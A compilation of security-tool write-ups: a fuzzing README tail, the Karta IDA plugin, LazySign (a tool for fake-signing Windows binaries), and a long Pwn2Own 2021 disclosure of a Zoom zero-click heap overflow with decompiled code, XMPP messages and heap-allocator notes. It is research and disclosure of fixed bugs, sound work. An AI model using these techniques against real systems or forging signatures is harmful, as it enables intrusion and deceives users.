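    std::string buf = fdp.ConsumeRemainingBytesAsString();

    target_function(mode, reinterpret_cast<const uint8_t *>(buf.data()), buf.size());
    return 0;
}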


Contribution/Bugs

If you find any bugs with this program, please create an issue. I will try to come up with a fix. Also, if you have any ideas on any new features or how to implement performance upgrades or the current planned features, please create a pull request or an issue with the tag (contribution).


PSA

This tool generates some false positives. Please first analyze the crashes and check whether each one is a valid bug or just an artifact of the generated harness. Also, you can enable the debug mode if some functions are not compiling. This will help you understand whether there are some header files you are missing or any linkage issues. If the project you are working on does not have shared libraries but only an executable, make sure to compile the executable as PIE so that this program can convert it into a shared library.


References
  1. https://lief.quarkslab.com/doc/latest/tutorials/08_elf_bin2lib.html


Karta - Source Code Assisted Fast Binary Matching Plugin For IDA


"Karta" (Russian for "Map") is an IDA Python plugin that identifies and matches open-sourced libraries in a given binary. The plugin uses a unique technique that enables it to support huge binaries (>200,000 functions), with almost no impact on the overall performance.

The matching algorithm is location-driven. This means that its main focus is to locate the different compiled files, and match each of the file's functions based on their original order within the file. This way, the matching depends on K (the number of functions in the open source) instead of N (the size of the binary), gaining a significant performance boost as usually N >> K.

We believe that there are 3 main use cases for this IDA plugin:

  1. Identifying a list of used open sources (and their versions) when searching for a useful 1-Day
  2. Matching the symbols of supported open sources to help reverse engineer a malware
  3. Matching the symbols of supported open sources to help reverse engineer a binary / firmware when searching for 0-Days in proprietary code

Read The Docs

https://karta.readthedocs.io/


Installation (Python 3 & IDA >= 7.4)

For the latest versions, using Python 3, simply git clone the repository and run the setup.py install script. Python 3 is supported in versions v2.0.0 and above.


Installation (Python 2 & IDA < 7.4)

As of the release of IDA 7.4, Karta is only actively developed for IDA 7.4 or newer, and Python 3. Python 2 and older IDA versions are still supported using the release version v1.2.0, which is most probably going to be the last supported version due to python 2.X end of life.


Identifier

Karta's identifier is a smaller plugin that identifies the existence of supported open source libraries within the binary and fingerprints their versions. No more need to reverse engineer the same open-source library again and again: simply run the identifier plugin and get a detailed list of the used open sources. Karta currently supports more than 10 open source libraries, including:

  • OpenSSL
  • Libpng
  • Libjpeg
  • NetSNMP
  • zlib
  • Etc.

Matcher

After identifying the used open sources, one can compile a .JSON configuration file for a specific library (libpng version 1.2.29, for instance). Once compiled, Karta will automatically attempt to match the functions (symbols) of the open source in the loaded binary. In addition, in case your open source uses external functions (memcpy, fread, or zlib_inflate), Karta will attempt to match those external functions as well.


Folder Structure
  • src: source directory for the plugin
  • configs: pre-supplied *.JSON configuration files (hoping the community will contribute more)
  • compilations: compilation tips for generating the configuration files, and lessons from past open sources
  • docs: sphinx documentation directory

Additional Reading

Credits

This project was developed by me (see contact details below) with help and support from my research group at Check Point (Check Point Research).


Contact (Updated)

This repository was developed and maintained by me, Eyal Itkin, during my years at Check Point Research. Sadly, with my departure from the research group, I will no longer be able to maintain this repository. This is mainly because of the long list of requirements for running all of the regression tests, and the IDA Pro versions that are involved in the process.

Please accept my sincere apology.

@EyalItkin



LazySign - Create Fake Certs For Binaries Using Windows Binaries And The Power Of Bat Files


Create fake certs for binaries using windows binaries and the power of bat files

Over the years, several cool tools have been released that are capable of stealing or forging fake signatures for binary files. All of these tools, however, have additional dependencies which require Go, Python, etc.


This repo gives you the ability to fake-sign binaries with zero additional dependencies; all of the binaries used are part of Microsoft's own devkits. I took the liberty of writing a bat file to make things easy.

So if you are lazy like me, just clone the repo, run the bat file, follow the instructions and enjoy your new fake-signed binary. With some adjustments it could even be used to sign using valid certs as well ¯\_(ツ)_/¯



Zoom RCE from Pwn2Own 2021

On April 7, 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that the related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003), we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but also provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had profound experience with exploiting memory corruption vulnerabilities on many platforms, both of us had zero experience with this on Windows, so during this project we had a lot to learn about Windows internals.

Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Own pic.twitter.com/qpw7yIEQLS

— Zero Day Initiative (@thezdi) April 7, 2021

This is going to be quite a long post. So before we dive into the details, now that the vulnerabilities have been fixed, below you can see a full run of the exploit (now fixed) in action. The post hereafter will explain in detail every step that took place during the exploitation phase and how we came to this solution.

Announcement

Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didn’t expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of attention to security, including many specific defensive layers. We’d also be competing with many others who may have had a full year to prepare their exploits.

To our surprise, on January 27th Pwn2Own was officially announced with a new category: “Enterprise Communications”, featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.

Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at https://t.co/suCceKxI0T #P2O

— Zero Day Initiative (@thezdi) January 26, 2021

We had not yet decided between Zoom and Microsoft Teams. We made a guess for what type of vulnerability we would expect could lead to RCE in those applications: Microsoft Teams is developed using Electron with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than XSS.

Step 1: What is this “Zoom”?

Both of us had not used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all the ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full-featured chat client included, with the ability to send images, create group chats, and much more. Within meetings, there’s of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as much as possible of the features.

Step 2: Network interception

The next step was to get visibility into the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat functionality itself uses an XMPP connection. Meetings appear to have a number of different options depending on what the network allows, the main one being a custom UDP-based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed like a (custom) binary protocol.

Step 3: Disassembly

The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.

However, it became quite clear that we weren’t going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here, everything is passed to a callback in a different DLL.

In the next DLL’s we hit a bit of a wall. The disassembly of the other DLL’s was almost impossible to get through due to a large number of calls to vtables and other DLL’s. Almost nothing was available to give us some grip on the disassembled code. The main reason for that was that most DLL’s do no logging at all. Logs are of course useful for dynamic analysis, but also for static analysis they can be very useful, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while running it nothing was logged at all.

After some searching, we found the support pages for how to generate a Troubleshooting log for Zoom:

After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.

This suggests that logging is compile-time disabled, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules don’t mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as test units Tesla can give to interested researchers.

Sadly, Zoom turned this request down - we don’t know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has a SDK that can be used to integrate the Zoom meeting functionality in other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesn’t have all of them (some UI related DLL’s are missing), but it has enough to get a good overview of the functionality of the core message handling.

The logging also revealed file names and function names, as can be seen in this disassembled example:

iVar2 = logging::GetMinLogLevel();
if (iVar2 < 2) {
    logging::LogMessage::LogMessage
              (local_c8,
               "c:\\ZoomCode\\client_sdk_2019_kof\\client\\src\\framework\\common\\SaasBeeWebServiceModule\\ZoomNetworkMonitor.cpp"
               , 0x39, 1);
    uVar3 = log_message(iVar2 + 8, "[NetworkMonitor::~NetworkMonitor()]", " ", uVar1);
    log_message(uVar3);
    logging::LogMessage::~LogMessage(local_c8);
}

Step 4: Hunting for bugs

With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well known library is used for XMPP and we would also need to get our payload through the server, so any invalid XML would not get to the other client. Many operations using strings are using C++ std::string objects, which meant that buffer overflows due to mistakes in length calculations are also not very likely.

About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:

len = Cmm::CStringT<char>::size(param_1);
result = malloc(len << 2);
len = Cmm::CStringT<char>::size(param_1);
buffer = Cmm::CStringT<char>::c_str(param_1);
status = EVP_DecodeBlock(result, buffer, len);

EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but that’s not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoom’s own code for a while.
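
For comparison, a correctly sized allocation for EVP_DecodeBlock would look something like the sketch below: the function writes 3 output bytes for every 4 input characters (padding included), so 3/4 of the input length is enough.

#include <openssl/evp.h>
#include <stdlib.h>

// Correctly sized base64 decode: EVP_DecodeBlock produces 3 bytes for every
// 4 input characters, so allocate 3/4 of the input size (rounded up) instead
// of four times the input size.
unsigned char *base64_decode(const unsigned char *in, int in_len, int *out_len) {
    int alloc_len = 3 * ((in_len + 3) / 4);              // instead of in_len << 2
    unsigned char *out = (unsigned char *)malloc(alloc_len);
    if (out == NULL)
        return NULL;
    *out_len = EVP_DecodeBlock(out, in, in_len);         // returns -1 on error
    return out;
}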

Step 5: The Bug

Zoom’s chat functionality supports a setting named “Advanced chat encryption” (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.

Version 1 works more or less like this (as far as we could understand from the code):

  1. The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="85DC3552-56EE-4307-9F10-483A0CA1C611" type="chat">
  <body>[This is an encrypted message]</body>
  <thread>gloox{BFE86A52-2D91-4DA0-8A78-DC93D3129DA0}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="SendMessage">
      <msg>
        <message>/fWuV6UYSwamNEc40VKAnA==</message>
        <iv>sriMTH04EXSPnphTKWuLuQ==</iv>
      </msg>
      <xkey>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="35">
    <nos>You have received an encrypted message.</nos>
  </zmtask>
  <zmext expire_t="1680466611000" t="1617394611169">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
  </zmext>
</message>
  2. The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipient’s client automatically sends a RequestKey message to the other user, which includes the recipient’s X509 certificate in order to encrypt the message key (<pub_cert>).
<message xmlns="jabber:client" to="[email protected]" id="{684EF27D-65D3-4387-9473-E87279CCA8B1}" type="chat" from="[email protected]/ZoomChat_pc">
  <thread>gloox{25F7E533-7434-49E3-B3AC-2F702579C347}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <zmext>
    <msg_type>207</msg_type>
    <from n="Jane Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</scid>
      <recv>[email protected]</recv>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="RequestKey">
      <xkey>
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTA0MDIxMjAzNDVaFw0yMjA0MDIxMjMzNDVaMEoxLDAqBgNVBAMMI2VrM19mZHZ5dHFnbTB6emxtY25kZ2FAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAa5LZ0vdjfjTDbPnuK2Pj1WKRaBee0QoAUQ281Z+uG4Ui58+QBSfWVVWCrG/8R4KTPvhS7/utzNIe+5R8oE69EPFAFNBMe/nCugYfi/EzEtwzor/x1R6sE10rIBGwFwKNSnzxtwDbiFmjpWFFV7TAdT/wr/f1E1ZkVR4ooitgVwGfREVMA0GCSqGSIb3DQEBCwUAA4IBAQAbtx2A+A956elf/eGtF53iQv2PT9I/4SNMIcX5Oe/sJrH1czcTfpMIACpfbc9Iu6n/WNCJK/tmvOmdnFDk2ekDt9jeVmDhwJj2pG+cOdY/0A+5s2E5sFTlBjDmrTB85U4xw8ahiH9FQTvj0J4FJCAPsqn0v6D87auA8K6w13BisZfDH2pQfuviJSfJUOnIPAY5+/uulaUlee2HQ1CZAhFzbBjF9R2LY7oVmfLgn/qbxJ6eFAauhkjn1PMlXEuVHAap1YRD8Y/xZRkyDFGoc9qZQEVj6HygMRklY9xUnaYWgrb9ZlCUaRefLVT3/6J21g6G6eDRtWvE1nMfmyOvTtjC</pub_cert>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <v2data action="None"/>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
</message>
  3. The sender responds to the RequestKey message with a ResponseKey message. This contains the sender’s X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the sender’s private key and the recipient’s public key, and a signature in <signature>.
<message from="[email protected]/ZoomChat_pc" to="[email protected]" id="4D6D109E-2AF2-4444-A6FD-55E26F6AB3F0" type="chat">
  <thread>gloox{24A77779-3F77-414B-8BC7-E162C1F3BDDF}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <ze2e>
    <tp>
      <send>[email protected]</send>
      <sres>ZoomChat_pc</sres>
      <scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid>
      <recv>[email protected]</recv>
      <rres>ZoomChat_pc</rres>
      <rcid>tJKVTqrloavxzawxMZ9Kk0Dak3LaDPKKNb+vcAqMztQ=</rcid>
      <ssid>[email protected]</ssid>
      <cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid>
    </tp>
    <action type="ResponseKey">
      <xkey create_time="1617394606">
        <pub_cert>MIICcjCCAVqgAwIBAgIBCjANBgkqhkiG9w0BAQsFADA3MSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxEjAQBgNVBAMMCSouem9vbS51czAeFw0yMTAyMTgxOTIzMjJaFw0yMjAyMTgxOTUzMjJaMEoxLDAqBgNVBAMMI2V3Y2psbmlfcndjamF5Z210cHZuZXdAeG1wcC56b29tLnVzMQ0wCwYDVQQKEwRaT09NMQswCQYDVQQGEwJVUzCBmzAQBgcqhkjOPQIBBgUrgQQAIwOBhgAEAPyPYr49WDKcwh2dc1V1GMv5whVyLaC0G/CzsvJXtSoSRouPaRBloBBlay2JpbYiZIrEBek3ONSzRd2Co1WouqXpASo2ADI/+qz3OJiOy/e4ccNzGtCDZTJHWuNVCjlV3abKX8smSDZyXc6eGP72p/xE96h80TLWpqoZHl1Ov+JiSVN/MA0GCSqGSIb3DQEBCwUAA4IBAQCUu+e8Bp9Qg/L2Kd/+AzYkmWeLw60QNVOw27rBLytiH6Ff/OmhZwwLoUbj0j3JATk/FiBpqyN6rMzL/TllWf+6oWT0ZqgdtDkYvjHWI6snTDdN60qHl77dle0Ah+VYS3VehqtqnEhy3oLiP3pGgFUcxloM85BhNGd0YMJkro+mkjvrmRGDu0cAovKrSXtqdXoQdZN1JdvSXfS2Otw/C2x+5oRB5/03aDS8Dw+A5zhCdFZlH4WKzmuWorHoHVMS1AVtfZoF0zHfxp8jpt5igdw/rFZzDxtPnivBqTKgCMSaWE5HJn9JhupHisoJUipGD8mvkxsWqYUUEI2GDauGw893</pub_cert>
        <encoded>...</encoded>
        <signature>MIGHAkIBaq/VH7MvCMnMcY+Eh6W4CN7NozmcXrRSkJJymvec+E5yWqF340QDNY1AjYJ3oc34ljLoxy7JeVjop2s9k1ZPR7cCQWnXQAViihYJyboXmPYTi0jRmmpBn61OkzD6PlAqAq1fyc8e6+e1bPsu9lwF4GkgI40NrPG/kbUx4RbiTp+Ckyo0</signature>
        <owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner>
      </xkey>
    </action>
    <app v="0"/>
  </ze2e>
  <zmtask feature="50"/>
  <zmext t="1617394613961">
    <from n="John Doe" e="[email protected]" res="ZoomChat_pc"/>
    <to/>
    <visible>false</visible>
  </zmext>
</message>

The way the key is encrypted has two options, depending on the type of key used by the recipient’s certificate. If it uses a RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.

The default, however, is not to use RSA but to use an elliptic curve key on the curve P-521. Algorithms for directly encrypting data with elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, elliptic curve Diffie-Hellman is performed using both users’ keys to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.
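
The general scheme described here, ECDH to derive a shared secret which is then split into an AES key and IV to wrap the message key, looks roughly like the following OpenSSL sketch. This is our reconstruction for illustration only; the exact key sizes, the way the secret is split, and any KDF Zoom applies are assumptions.

#include <openssl/evp.h>

// Derive a shared secret from our P-521 private key and the peer's public key,
// then use it as an AES-256-CBC key and IV to encrypt the message key.
// Splitting the raw secret into key (32 bytes) and IV (16 bytes) is an assumption.
int wrap_message_key(EVP_PKEY *own_priv, EVP_PKEY *peer_pub,
                     const unsigned char *msg_key, int msg_key_len,
                     unsigned char *out, int *out_len) {
    unsigned char secret[66];                 // a P-521 shared secret is up to 66 bytes
    size_t secret_len = sizeof(secret);

    EVP_PKEY_CTX *kctx = EVP_PKEY_CTX_new(own_priv, NULL);
    if (kctx == NULL || EVP_PKEY_derive_init(kctx) <= 0 ||
        EVP_PKEY_derive_set_peer(kctx, peer_pub) <= 0 ||
        EVP_PKEY_derive(kctx, secret, &secret_len) <= 0) {
        EVP_PKEY_CTX_free(kctx);
        return 0;
    }
    EVP_PKEY_CTX_free(kctx);

    EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
    int len = 0, total = 0;
    EVP_EncryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, secret, secret + 32);
    EVP_EncryptUpdate(ctx, out, &len, msg_key, msg_key_len);
    total = len;
    EVP_EncryptFinal_ex(ctx, out + total, &len);
    total += len;
    EVP_CIPHER_CTX_free(ctx);

    *out_len = total;
    return 1;
}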

When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.

The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input buffer’s length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length, it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.

undefined4 __fastcall AESDecode(undefined4 *param_1, undefined4 *param_2) {
  char cVar1;
  int iVar2;
  undefined4 uVar3;
  int iVar4;
  LogMessage *this;
  int extraout_EDX;
  int iVar5;
  LogMessage local_180 [176];
  LogMessage local_d0 [176];
  int local_20;
  undefined4 *local_1c;
  int local_18;
  int local_14;
  undefined4 local_8;
  undefined4 uStack4;
  
  uStack4 = 0x170;
  local_8 = 0x101ba696;
  iVar5 = 0;
  local_14 = 0;
  local_1c = param_2;
  cVar1 = FUN_101ba34a();

  if (cVar1 == '\0') {
    return 1;
  }

  if ((*(uint *)(extraout_EDX + 4) < 0x20) || (*(uint *)(extraout_EDX + 0xc) < 0x10)) {
    iVar5 = logging::GetMinLogLevel();
    
    if (iVar5 < 2) {
      logging::LogMessage::LogMessage
                (local_d0, "c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1d6, 1);
      local_8 = 0;
      local_14 = 1;
      uVar3 = log_message(iVar5 + 8, "[AESDecode] Failed. Key len or IV len is incorrect.", " ");
      log_message(uVar3);
      logging::LogMessage::~LogMessage(local_d0);

      return 1;
    }

    return 1;
  }

  local_14 = param_1[2];
  local_18 = 0;
  iVar2 = EVP_CIPHER_CTX_new();

  if (iVar2 == 0) {
    return 0xc;
  }

  local_20 = iVar2;
  EVP_CIPHER_CTX_reset(iVar2);
  uVar3 = EVP_aes_256_cbc(0, *local_1c, local_1c[2], 0);
  iVar4 = EVP_CipherInit_ex(iVar2, uVar3);

  if (iVar4 < 1) {
    iVar2 = logging::GetMinLogLevel();

    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1e8, 1);
      iVar5 = 2;
      local_8 = 1;
      local_14 = 2;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherInit_ex Failed.", " ");
      log_message(uVar3);
    }
LAB_101ba758:
    if (iVar5 == 0) goto LAB_101ba852;
    this = local_d0;
  } else {
    iVar4 = EVP_CipherUpdate(iVar2, local_14, &local_18, *param_1, param_1[1]);

    if (iVar4 < 1) {
      iVar2 = logging::GetMinLogLevel();

      if (iVar2 < 2) {
        logging::LogMessage::LogMessage
                  (local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                  0x1f0, 1);
        iVar5 = 4;
        local_8 = 2;
        local_14 = 4;
        uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherUpdate Failed.", " ");
        log_message(uVar3);
      }
      goto LAB_101ba758;
    }

    param_1[3] = local_18;
    iVar4 = EVP_CipherFinal_ex(iVar2, local_14 + local_18, &local_18);

    if (0 < iVar4) {
      param_1[3] = param_1[3] + local_18;
      EVP_CIPHER_CTX_free(iVar2);
      return 0;
    }

    iVar2 = logging::GetMinLogLevel();
    if (iVar2 < 2) {
      logging::LogMessage::LogMessage
                (local_180,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",
                 0x1fb, 1);
      iVar5 = 8;
      local_8 = 3;
      local_14 = 8;
      uVar3 = log_message(iVar2 + 8, "[AESDecode] EVP_CipherFinal_ex Failed.", " ");
      log_message(uVar3);
    }

    if (iVar5 == 0) goto LAB_101ba852;
    this = local_180;
  }
  
  logging::LogMessage::~LogMessage(this);
LAB_101ba852:
  EVP_CIPHER_CTX_free(local_20);
  return 0xc;
}

Side note: we don’t know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client, but having a legitimate client initiate it requires an old version of the client, which appears to be malfunctioning (it can no longer log in).

We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely without user interaction by sending a few chat messages to a user who had previously accepted an external contact request or was in the same multi-user chat. This was looking promising.

Step 6: Path to exploitation

To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:

  • Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
  • Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
  • Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
  • Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
  • Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
  • Con: The buffer is allocated and then used for the overflow while handling the same packet. We cannot place the buffer first, allocate something else after it, and only then overflow.

We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few already during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.

Step 7: Understanding the Windows heap allocator

To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which don’t include Zoom, so the NT Heap is what was used. The NT Heap has two different allocators (for allocations less than about 16 kB): the front-end allocator (known as the Low-Fragmentation Heap or LFH) and the back-end allocator.

Before we go into detail for how those two allocators work, we’ll introduce some definitions:

  • Block: a memory area which can be returned by the allocator, either in use or not.
  • Bucket: a group of blocks handled by the LFH.
  • Page: a memory area assigned by the OS to a process.

By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.
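
As a mental model of the behaviour described above, here is a toy C++ freelist. It is heavily simplified: the real back-end allocator stores headers in the blocks themselves, keeps the list sorted, and coalesces neighbouring free blocks, none of which this sketch does.

#include <cstddef>
#include <cstdint>
#include <map>

// Toy back-end-style allocator: free blocks ordered by size. Allocation takes
// the first block that is large enough, splits it, and returns the remainder
// to the list. Illustration only, not the actual NT heap.
class ToyBackEnd {
    std::multimap<size_t, uintptr_t> freelist_;   // size -> block address
public:
    void add_free_block(uintptr_t addr, size_t size) {
        freelist_.emplace(size, addr);
    }

    uintptr_t allocate(size_t size) {
        auto it = freelist_.lower_bound(size);    // first block of at least `size`
        if (it == freelist_.end())
            return 0;                             // the real heap would request a new page here
        uintptr_t addr = it->second;
        size_t block_size = it->first;
        freelist_.erase(it);
        if (block_size > size)                    // split: the remainder goes back in
            add_free_block(addr + size, block_size - size);
        return addr;
    }

    void free_block(uintptr_t addr, size_t size) {
        // The real allocator first tries to merge with adjacent free blocks.
        add_free_block(addr, size);
    }
};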

The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).

The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.

The front-end allocator, or LFH, is used for allocations for sizes that are used often to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks the bucket most recently used for an allocation of that size if it still has room. If it does not, it checks if there are any other buckets for that size range with available room. If there are none, a new bucket is created.

No matter if the LFH or back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses a XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.

For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same range are combined in a bucket, so to overwrite a block from a different range you would have to make sure two buckets are placed adjacent. In addition, which free slot from a bucket is used is randomized.

For these reasons we focused initially on the back-end allocator. We quickly realized we couldn’t use any of the OpenSSL objects we found previously: when we launch Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above it too) would already be handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes so guaranteed to be placed in a LFH bucket.

